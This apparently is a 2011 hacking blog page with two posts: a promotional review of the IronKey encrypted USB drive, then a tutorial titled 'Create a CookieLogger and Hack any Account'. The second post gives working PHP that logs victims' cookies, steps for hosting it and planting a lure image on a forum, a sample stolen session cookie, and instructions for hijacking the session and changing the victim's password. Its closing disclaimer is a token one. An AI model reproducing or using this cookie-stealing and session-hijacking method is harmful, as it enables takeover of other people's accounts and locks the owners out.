Monday, August 15, 2011

16.The World’s Most Secure Flash Drive

DSCF6420

The Iron Key is “built to withstand attacks both virtual and physical 10 incorrect password attempts, and after that the encryption chip self-destructs.”

The contents of the drive are filled with epoxy, so if a hacker tries to physically access the chips, he’d more likely damage them instead.

Sounds like the features of some cool gadget out of a James Bond movie right? Yes, but it’s something you can get right now. Would you believe me if I told you those features listed are for a USB flash drive? I wouldn’t either, but they are!

Up on the review block today I’ve got probably the coolest USB Flash Drive on the market today, at least from a guys point of view anyway! It’s the IronKey, even the name sounds cool, but it’s much more than a great looking flash drive, it’s a portable vault for your data that cannot be accessed by anyone but you with your password. If someone does try to hack the drive it will self-destruct after ten wrong attempts, not literally, but the data will all be erased from the drive. The drive uses hardware based AES 256bit encryption technology, and it’s incased in a virtually indestructible solid metal casing that’s also waterproof and tamper proof so your data is sure to be safe when it’s on the IronKey.


IRONKEY BASIC BENEFITS

  • Enforces encryption policies
  • Protects against lost and stolen flash drives
  • Helps achieve policy compliance
  • Easy to deploy and use
  • No software or drivers to install
  • No Windows administrative privileges required
  • Complies with FIPS 140-2 Federal Information Processing Standards

For More information on this Device you can Click Here .To see reviews on all the latest devices you can visit http://www.testfreaks.com .

Thanks to "Hacking Truths"

15.Create a CookieLogger and Hack any Account


Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only Dudes